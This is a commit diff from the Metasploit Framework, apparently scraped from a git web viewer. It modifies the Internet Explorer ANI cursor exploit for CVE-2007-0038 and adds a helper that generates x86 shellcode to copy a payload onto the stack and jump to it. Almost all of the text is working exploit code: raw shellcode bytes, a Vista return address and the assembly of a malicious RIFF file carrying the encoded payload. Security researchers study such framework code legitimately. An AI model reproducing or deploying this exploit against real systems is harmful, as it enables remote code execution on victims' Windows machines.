here we go
git-svn-id: file:///home/svn/framework3/trunk@4613 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
fd44163b37
commit
97b6cf3636
|
@ -59,6 +59,29 @@ module X86
|
|||
"\x75\xfa" + # jnz 0x10 (start_search)
|
||||
jmp_reg('edi') # jmp edi
|
||||
end
|
||||
|
||||
#
|
||||
# Generates a buffer that will copy memory immediately following the stub
|
||||
# that is generated to be copied to the stack
|
||||
#
|
||||
def self.copy_to_stack(len)
|
||||
# four byte align
|
||||
len = (len + 3) & ~0x3
|
||||
|
||||
stub =
|
||||
"\xcc" +
|
||||
"\xeb\x0f"+ # jmp _end
|
||||
"\x68" + [len].pack('V')+ # push n
|
||||
"\x59"+ # pop ecx
|
||||
"\x5e"+ # pop esi
|
||||
"\x29\xcc"+ # sub esp, ecx
|
||||
"\x89\xe7"+ # mov edi, esp
|
||||
"\xf3\xa4"+ # rep movsb
|
||||
"\xff\xe4"+ # jmp esp
|
||||
"\xe8\xec\xff\xff\xff" # call _start
|
||||
|
||||
stub
|
||||
end
|
||||
|
||||
#
|
||||
# This method returns the opcodes that compose a short jump instruction to
|
||||
|
|
|
@ -60,13 +60,12 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'Space' => 1024 + (rand(1000)),
|
||||
'MinNops' => 32,
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => '-find',
|
||||
},
|
||||
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
|
@ -102,16 +101,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
# tag contains a short jump into an embedded riff chunk that
|
||||
# makes a long relative jump into the actual payload.
|
||||
#
|
||||
[ 'Windows Vista user32.dll 6.0.6000.16386',
|
||||
{
|
||||
'Ret' => 0x700b,
|
||||
'Len' => 2,
|
||||
|
||||
# On Vista, the pages that contain the RIFF are read-only.
|
||||
# In-place decoders cannot be used.
|
||||
'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw }
|
||||
}
|
||||
]
|
||||
[ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ]
|
||||
|
||||
],
|
||||
'DisclosureDate' => 'Mar 28 2007',
|
||||
|
@ -296,22 +286,18 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
|
||||
end
|
||||
|
||||
# Our ANI file is randomly placed into a read-only segment, the only reliable
|
||||
# solution is to copy our payload back to the stack and execute it there. This
|
||||
# is non-optimal and should be replaced soon.
|
||||
copier =
|
||||
"\xeb\x0f"+ # jmp _end
|
||||
"\x68\x00\x04\x00\x00"+ # push 1024
|
||||
"\x59"+ # pop ecx
|
||||
"\x5e"+ # pop esi
|
||||
"\x29\xcc"+ # sub esp, ecx
|
||||
"\x89\xe7"+ # mov edi, esp
|
||||
"\xf3\xa4"+ # rep movsb
|
||||
"\xff\xe4"+ # jmp esp
|
||||
"\xe8\xec\xff\xff\xff" # call _start
|
||||
|
||||
# Place the RIFF chunk in front and off we go
|
||||
ret = "RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded
|
||||
ret = "RIFF" + [riff.length].pack('V') + riff
|
||||
|
||||
# We copy the encoded payload to the stack because sometimes the RIFF
|
||||
# image is mapped in read-only pages. This would prevent in-place
|
||||
# decoders from working, and we can't have that.
|
||||
ret << Rex::Arch::X86.copy_to_stack(payload.encoded.length)
|
||||
|
||||
# Place the real payload right after it.
|
||||
ret << payload.encoded
|
||||
|
||||
ret
|
||||
end
|
||||
|
||||
# Generates a riff chunk with the first bytes of the data being a relative
|
||||
|
|
Loading…
Reference in New Issue